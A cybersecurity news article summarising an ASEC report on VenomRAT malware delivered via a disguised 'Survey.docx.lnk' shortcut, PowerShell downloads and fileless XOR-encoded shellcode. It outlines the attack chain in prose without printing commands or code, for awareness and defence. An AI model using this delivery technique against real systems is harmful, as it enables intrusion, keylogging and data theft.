A recent report reveals that hackers have been using weaponized office documents to spread VenomRAT malware. Cybersecurity researchers at AhnLab Security Intelligence Center (ASEC) identified this alarming trend and found that hackers are actively exploiting loopholes in Office documents to deliver VenomRAT, a type of malware that can execute malicious commands, download additional scripts, and steal sensitive data from affected systems.
One of the techniques used in these attacks involves disguising a malicious shortcut file as a legitimate Word document that is bundled in a compressed file. The attack uses a file called ‘blues.exe,’ which is disguised as a Korean company’s certificate in an attempt to trick users into executing it. The malicious shortcut file, named ‘Survey.docx.lnk,’ is designed to execute malicious commands that connect to an external URL, which then downloads additional files to the %appdata% directory using PowerShell commands.
The downloaded file, ‘qfqe.docx,’ may appear innocent, but it actually contains ‘blues.exe,’ which acts as a malware downloader. When executed, it downloads additional scripts through PowerShell, including ‘sys.ps1,’ which further fetches data from ‘adb.dll’ in a fileless format. The ‘adb.dll’ file contains an encoded shellcode decrypted by XORing Base64 with the ‘sorootktools’ string. This complex attack chain highlights the sophistication and stealth of the hackers behind these malicious activities.
Once the malware is executed, it conducts a range of malicious activities, including keylogging, leaking PC information, and obeying commands from the threat actor. This means that the hackers behind these attacks can potentially gain unauthorized access to sensitive information, compromise affected systems, and carry out malicious activities without the knowledge of the user.
The report also provides a list of Indicators of Compromise (IOCs) that can help security professionals detect and mitigate these types of threats. The IOCs include file and behavior detections, MD5 hashes, and Command and Control (C&C) server URLs associated with the malware. This information can be used to proactively protect organizations and individuals from falling victim to these types of attacks.
The findings of this report highlight the growing sophistication and prevalence of malware attacks using weaponized office documents. As cyber threats continue to evolve, it is essential for individuals and organizations to stay updated on the latest tactics and techniques used by hackers. Implementing robust security measures, including comprehensive antivirus solutions and employee training programs, can help mitigate the risks associated with these types of attacks.
In conclusion, the growing adoption of cloud-based services, remote work, and digital communication tools has created new opportunities for hackers to exploit vulnerabilities in office documents. As demonstrated by the recent findings from ASEC, it is crucial for individuals and organizations to remain vigilant and implement best practices to defend against malicious attacks and protect sensitive information from unauthorized access and exploitation.